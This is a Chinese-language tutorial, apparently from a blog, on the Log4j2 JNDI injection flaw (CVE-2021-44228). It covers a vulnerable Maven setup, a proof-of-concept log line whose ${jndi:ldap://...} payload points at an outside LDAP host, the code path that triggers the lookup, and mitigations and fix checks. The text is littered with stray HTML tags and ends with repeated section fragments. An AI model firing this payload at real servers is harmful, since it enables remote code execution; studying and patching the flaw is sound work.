Log4j2注入漏洞原理分析与复现<\/h1>

1. 漏洞概述<\/h2>
Log4j2注入漏洞（CVE-2021-44228）是Apache Log4j2日志框架中存在的一个严重远程代码执行漏洞。该漏洞允许攻击者通过构造特殊的日志消息触发JNDI注入，从而在目标服务器上执行任意代码。<\/p>

2. 环境搭建<\/h2>

2.1 Maven项目配置<\/h3>

创建Maven项目，pom.xml<\/code>文件需包含以下依赖：<\/p>

<dependencies><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.apache.logging.log4j<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>log4j-core<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>2.14.1<\/version><\/span> <!-- 漏洞版本 --><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.apache.logging.log4j<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>log4j-api<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>2.14.1<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>2.2 Log4j2配置文件<\/h3>
在resources<\/code>目录下创建log4j2.xml<\/code>配置文件：<\/p>
<?xml version="1.0" encoding="UTF-8"?><\/span>
<\/span><\/span><configuration<\/span> status=<\/span>"info"<\/span>><\/span>
<\/span><\/span>    <Properties><\/span>
<\/span><\/span>        <Property<\/span> name=<\/span>"pattern1"<\/span>><\/span>[%-5p] %d %c - %m%n<\/Property><\/span>
<\/span><\/span>        <Property<\/span> name=<\/span>"pattern2"<\/span>><\/span> ==n 日志级别:%p%n 日志时间:%d%n 所属类名:%c%n 所属线程:%t%n 日志信息:%m%n <\/Property><\/span>
<\/span><\/span>        <Property<\/span> name=<\/span>"filePath"<\/span>><\/span>logs\/myLog.log<\/Property><\/span>
<\/span><\/span>    <\/Properties><\/span>
<\/span><\/span>    
<\/span><\/span>    <appenders><\/span>
<\/span><\/span>        <Console<\/span> name=<\/span>"Console"<\/span> target=<\/span>"SYSTEM_OUT"<\/span>><\/span>
<\/span><\/span>            <PatternLayout<\/span> pattern=<\/span>"${pattern1}"<\/span>\/><\/span>
<\/span><\/span>        <\/Console><\/span>
<\/span><\/span>        <RollingFile<\/span> name=<\/span>"RollingFile"<\/span> fileName=<\/span>"${filePath}"<\/span> 
<\/span><\/span>                     filePattern=<\/span>"logs\/
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>{date:yyyy-MM}\/app-%d{MM-dd-yyyy}-%i.log.gz"<\/span>><\/span>
<\/span><\/span>            <PatternLayout<\/span> pattern=<\/span>"${pattern2}"<\/span>\/><\/span>
<\/span><\/span>            <SizeBasedTriggeringPolicy<\/span> size=<\/span>"5 MB"<\/span>\/><\/span>
<\/span><\/span>        <\/RollingFile><\/span>
<\/span><\/span>    <\/appenders><\/span>
<\/span><\/span>    
<\/span><\/span>    <loggers><\/span>
<\/span><\/span>        <root<\/span> level=<\/span>"info"<\/span>><\/span>
<\/span><\/span>            <appender-ref<\/span> ref=<\/span>"Console"<\/span>\/><\/span>
<\/span><\/span>            <appender-ref<\/span> ref=<\/span>"RollingFile"<\/span>\/><\/span>
<\/span><\/span>        <\/root><\/span>
<\/span><\/span>    <\/loggers><\/span>
<\/span><\/span><\/configuration><\/span>
<\/span><\/span><\/code><\/pre>3. 漏洞复现POC<\/h2>
String username =<\/span> "${jndi:ldap:\/\/192.168.85.236:1389\/zkgeem}"<\/span>;<\/span>
<\/span><\/span>logger.<\/span>info<\/span>(<\/span>"User {} login in!"<\/span>,<\/span> username);<\/span>
<\/span><\/span><\/code><\/pre>4. 漏洞原理分析<\/h2>
4.1 漏洞触发流程<\/h3>


日志格式化<\/strong>：当调用logger.info()<\/code>时，Log4j2会调用PatternLayout<\/code>类的toSerializable<\/code>方法对日志进行格式化<\/p>
<\/li>

消息转换<\/strong>：进入MessagePatternConverter<\/code>类的format<\/code>方法，然后调用replace<\/code>方法<\/p>
<\/li>

变量替换<\/strong>：进入substitute<\/code>方法进行字符串匹配和变量替换<\/p>
<\/li>

JNDI解析<\/strong>：当遇到${jndi:...}<\/code>格式的字符串时，Log4j2会：<\/p>

解析JNDI变量<\/li>
向指定的LDAP\/LDAPS、RMI或DNS服务发起请求<\/li>
获取返回的Java对象并反序列化<\/li>
<\/ul>
<\/li>

代码执行<\/strong>：最终通过InitialContext.lookup()<\/code>方法触发代码执行<\/p>
<\/li>
<\/ol>
4.2 关键点分析<\/h3>


Lookup功能<\/strong>：Log4j 2.x支持多种lookup模块，如：<\/p>

${sys:user.name}<\/code> - 系统属性<\/li>
${java:version}<\/code> - Java版本信息<\/li>
${jndi:...}<\/code> - JNDI查询<\/li>
<\/ul>
<\/li>

问题根源<\/strong>：<\/p>

对用户输入的日志内容未做任何过滤<\/li>
直接解析并执行${jndi:...}<\/code>格式的字符串<\/li>
未验证JNDI请求的目标是否可信<\/li>
<\/ul>
<\/li>

攻击向量<\/strong>：<\/p>

攻击者可以构造恶意的LDAP\/RMI\/DNS地址<\/li>
服务器会无条件解析这些地址并执行返回的代码<\/li>
<\/ul>
<\/li>
<\/ol>
5. 漏洞利用条件<\/h2>

使用Log4j2版本2.0-beta9至2.14.1<\/li>
日志输出中包含用户可控的输入<\/li>
目标服务器能够访问外部网络（出站连接）<\/li>
<\/ol>
6. 防御措施<\/h2>

升级版本<\/strong>：升级到Log4j2 2.15.0或更高版本<\/li>
临时缓解<\/strong>：

设置系统属性log4j2.formatMsgNoLookups=true<\/code><\/li>
移除JndiLookup类：zip -q -d log4j-core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class<\/code><\/li>
<\/ul>
<\/li>
输入过滤<\/strong>：对用户输入进行严格过滤，避免直接记录到日志<\/li>
网络限制<\/strong>：限制服务器出站连接，特别是LDAP\/RMI\/DNS协议<\/li>
<\/ol>
7. 漏洞影响范围<\/h2>
几乎所有使用受影响版本Log4j2的Java应用程序都可能受到攻击，包括但不限于：<\/p>

Web应用程序<\/li>
企业级应用<\/li>
云服务<\/li>
嵌入式系统<\/li>
<\/ul>
8. 漏洞修复验证<\/h2>
修复后应验证：<\/p>

${jndi:ldap:\/\/example.com}<\/code>格式的字符串不再被解析<\/li>
日志中直接输出原始字符串而非解析后的内容<\/li>
不再有对外部JNDI服务的连接请求<\/li>
<\/ol>

Log4j2注入漏洞原理分析与复现<\/h1>

1. 漏洞概述<\/h2> Log4j2注入漏洞（CVE-2021-44228）是Apache Log4j2日志框架中存在的一个严重远程代码执行漏洞。该漏洞允许攻击者通过构造特殊的日志消息触发JNDI注入，从而在目标服务器上执行任意代码。<\/p>

2. 环境搭建<\/h2>

4. 漏洞原理分析<\/h2>

8. 漏洞修复验证<\/h2> 修复后应验证：<\/p> ${jndi:ldap:\/\/example.com}<\/code>格式的字符串不再被解析<\/li> 日志中直接输出原始字符串而非解析后的内容<\/li> 不再有对外部JNDI服务的连接请求<\/li> <\/ol>

1. 漏洞概述<\/h2>
Log4j2注入漏洞（CVE-2021-44228）是Apache Log4j2日志框架中存在的一个严重远程代码执行漏洞。该漏洞允许攻击者通过构造特殊的日志消息触发JNDI注入，从而在目标服务器上执行任意代码。<\/p>

8. 漏洞修复验证<\/h2>
修复后应验证：<\/p>

`${jndi:ldap:\/\/example.com}<\/code>格式的字符串不再被解析<\/li>`
`日志中直接输出原始字符串而非解析后的内容<\/li>`
`不再有对外部JNDI服务的连接请求<\/li> <\/ol>`